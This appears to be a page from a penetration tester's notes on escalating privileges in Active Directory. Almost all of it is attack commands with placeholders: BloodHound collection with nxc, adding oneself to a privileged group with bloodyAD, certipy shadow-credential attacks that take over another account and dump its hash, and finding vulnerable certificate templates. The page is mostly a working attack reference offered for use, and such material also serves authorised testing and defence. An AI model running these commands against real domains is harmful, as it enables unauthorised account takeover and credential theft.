Escalation

NXC

Gathering Data for Bloodhound to find escalation paths

nxc ldap [ds-host] -u [username] -p '[password]' --bloodhound --dns-server [dns ip] --collection all

BloodyAD

If we're a member of a group that has GenericAll or GenericWrite privileges over another group, we can assign ourselves to that group if it improves our reach

bloodyAD --host [dc-host] -d [domain] -u [username] -p '[password]' add groupMember "[Group Name]" [username]

Certipy

We can dump hashes of a user that we have GenericWrite over

BE SURE TO ADJUST YOUR CLOCK BEFORE THESE

ntpdate [domain]
certipy-ad shadow auto -username [username]@[domain] -password '[password]' -account [target account]

Getting Common Name of CA

NXC

nxc ldap [dc-host] -u [username] -H [user hash] -M adcs

Certutil

You can use Certutil to get this information if you're logged in as a user (Evil-winrm)

certutil -dump

Bloodhound

You can also see this in bloodhound

Find Vulnerable Templates

certipy-ad find -dc-ip [dc-ip] -u [username] -hashes [user hash] -ns [dns ip] -vulnerable

Links

Active Directory Certificate Services - Privilege Escalation as a ServiceProSec GmbH

PreviousBloodhound NextZeroLogon

Last updated 1 month ago